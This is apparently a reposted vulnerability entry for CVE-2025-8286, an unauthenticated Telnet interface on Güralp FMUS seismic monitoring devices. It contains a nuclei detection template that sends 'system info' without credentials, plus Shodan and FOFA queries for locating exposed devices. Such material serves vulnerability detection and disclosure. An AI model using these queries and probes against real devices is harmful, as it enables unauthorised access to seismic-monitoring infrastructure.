Güralp Systems FMUS Series Seismic Monitoring Devices - Missing Authentication for Critical Function

漏洞信息

漏洞名称: Güralp Systems FMUS Series Seismic Monitoring Devices - Missing Authentication for Critical Function

漏洞编号:

  • CVE: CVE-2025-8286

漏洞类型: 未授权访问

漏洞等级: 严重

漏洞描述: Güralp Systems FMUS系列地震监测设备是一款用于地震监测的专业设备,广泛应用于地震预警、地质勘探等领域。这些设备通常部署在地震活跃区域或科研机构,对于地震数据的收集和分析至关重要。由于其在关键基础设施中的应用,设备的安全性尤为重要。该设备存在未授权访问漏洞,具体表现为暴露了一个无需认证的基于Telnet的命令行接口。攻击者可以利用这一漏洞修改硬件配置、操纵数据或恢复设备出厂设置。漏洞的技术根源在于设备未能对Telnet访问实施适当的认证机制,导致任何能够访问该端口的用户都可以执行关键功能。这一漏洞的严重性在于,它允许攻击者远程控制设备,可能导致地震监测数据被篡改或设备功能被破坏,进而影响到地震预警的准确性和及时性。由于漏洞利用无需认证且可以自动化执行,因此风险极高。

产品厂商: guralp_systems

产品名称: guralp_fmus_series_seismic_monitoring_devices

搜索语法: “Welcome to “ && “list of available commands” && port=”4244”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/3c26069bab7b7582542e9ee75839834b95f7ca9e/http%2Fcves%2F2025%2FCVE-2025-8286.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75

id: CVE-2025-8286

info:
  name: Güralp Systems FMUS Series Seismic Monitoring Devices - Missing Authentication for Critical Function
  severity: critical
  author: darses
  description: |
    The affected products expose an unauthenticated Telnet-based command line interface that could allow an attacker to modify hardware configurations, manipulate data, or factory reset the device.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to modify hardware configurations, manipulate data, or factory reset the device.
  remediation: |
    Update to the latest firmware version or apply vendor recommended patches to secure Telnet access.
  classification:
    cwe-id: CWE-306
    cve-id: CVE-2025-8286
    cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
    cvss-score: 9.8
  metadata:
    vendor: guralp_systems
    product: guralp_fmus_series_seismic_monitoring_devices
    shodan-query:
      - '"Welcome to " "list of available commands" port:4244'
    fofa-query:
      - '"Welcome to " && "list of available commands" && port="4244"'
  reference:
    - https://www.cisa.gov/news-events/ics-advisories/icsa-25-212-01
    - https://www.cve.org/CVERecord?id=CVE-2025-8286
  tags: ics,cve,cve2025,tcp,telnet

tcp:
  - host:
      - "{{Hostname}}"

    port: 4244

    inputs:
      - data: "\n"
        read: 256
        name: banner

      - data: "system info\n"
        read: 256
        name: system_info

    matchers-condition: and
    matchers:
      - type: word
        part: banner
        words:
          - "Welcome to "
          - 'type "help" for a list of available commands'
        condition: and

      - type: word
        part: system_info
        words:
          - "Host Name: "
          - "Firmware Version: "
        condition: and

    extractors:
      - type: regex
        part: system_info
        group: 1
        regex:
          - "Host\\s+Name:\\s+([\\w\\d\\.\\-]+)"

      - type: regex
        part: system_info
        group: 1
        regex:
          - "Firmware\\s+Version:\\s+([\\d\\.\\-]+)"


Github Poc
#projectdiscovery/nuclei-templates:github issues #未授权访问
Güralp Systems FMUS Series Seismic Monitoring Devices - Missing Authentication for Critical Function
http://example.com/2025/08/01/github_932774752/
作者
lianccc
发布于
2025年8月1日
许可协议